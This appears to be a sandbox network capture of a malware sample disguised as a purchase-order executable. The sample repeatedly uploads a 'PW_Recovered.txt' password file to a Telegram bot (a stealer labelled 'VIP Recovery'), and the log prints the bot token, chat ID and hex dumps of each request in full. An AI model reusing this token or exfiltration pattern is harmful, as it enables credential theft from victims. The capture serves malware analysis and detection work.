filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:36 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:36 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:36 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 31 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17199,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354935,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49847	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:37 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd23bf4fc551b0 Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:37 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 62 66 34 66 63 35 35 31 62 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd23bf4fc551b0Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:38 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:37 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:38 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 37 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17201,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354937,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49853	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:39 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd24569962d1a7 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:39 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 35 36 39 39 36 32 64 31 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd24569962d1a7Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:39 GMT Content-Type: application/json Content-Length: 527 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:40 UTC	527	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 33 39 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17203,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354939,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49859	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:41 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd24e9b84a7521 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:41 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 34 65 39 62 38 34 61 37 35 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd24e9b84a7521Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:41 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:41 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 31 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17205,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354941,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49864	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:43 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd257981da6897 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:43 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 35 37 39 38 31 64 61 36 38 39 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd257981da6897Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:44 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:44 GMT Content-Type: application/json Content-Length: 530 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:44 UTC	530	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 34 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17207,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354944,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49871	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:45 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd261610f8ea3a Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:45 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 31 36 31 30 66 38 65 61 33 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd261610f8ea3aContent-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:46 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:46 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:46 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 30 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 36 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17209,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354946,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49876	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:47 UTC	369	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd269d6eebb803 Host: api.telegram.org Content-Length: 581 Connection: Keep-Alive
2024-12-16 13:15:47 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 39 64 36 65 65 62 62 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd269d6eebb803Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:48 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:48 GMT Content-Type: application/json Content-Length: 528 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-16 13:15:48 UTC	528	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 32 31 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 33 38 38 34 37 30 36 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 75 67 6f 6e 6f 76 32 34 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 75 67 6e 6f 76 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 34 35 31 37 38 36 35 32 37 37 2c 22 74 69 74 6c 65 22 3a 22 55 47 4e 20 32 30 32 34 20 4e 4f 56 22 2c 22 74 79 70 65 22 3a 22 67 72 6f 75 70 22 2c 22 61 6c 6c 5f 6d 65 6d 62 65 72 73 5f 61 72 65 5f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 73 22 3a 74 72 75 65 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 33 35 34 39 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 Data Ascii: {"ok":true,"result":{"message_id":17211,"from":{"id":7238847064,"is_bot":true,"first_name":"ugonov24","username":"ugnovbot"},"chat":{"id":-4517865277,"title":"UGN 2024 NOV","type":"group","all_members_are_administrators":true},"date":1734354948,"document"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49882	149.154.167.220	443	7340	C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-16 13:15:49 UTC	345	OUT	POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dd273af9796484 Host: api.telegram.org Content-Length: 581
2024-12-16 13:15:49 UTC	581	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 33 61 66 39 37 39 36 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 32 38 34 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 36 2f 31 32 2f 32 30 32 34 20 2f 20 30 38 3a 31 34 3a 31 31 0d Data Ascii: --------------------------8dd273af9796484Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW \| user \| VIP Recovery PC Name:472847Date and Time: 16/12/2024 / 08:14:11
2024-12-16 13:15:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Mon, 16 Dec 2024 13:15:50 GMT Content-Type: application/json Content-Length: 530 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
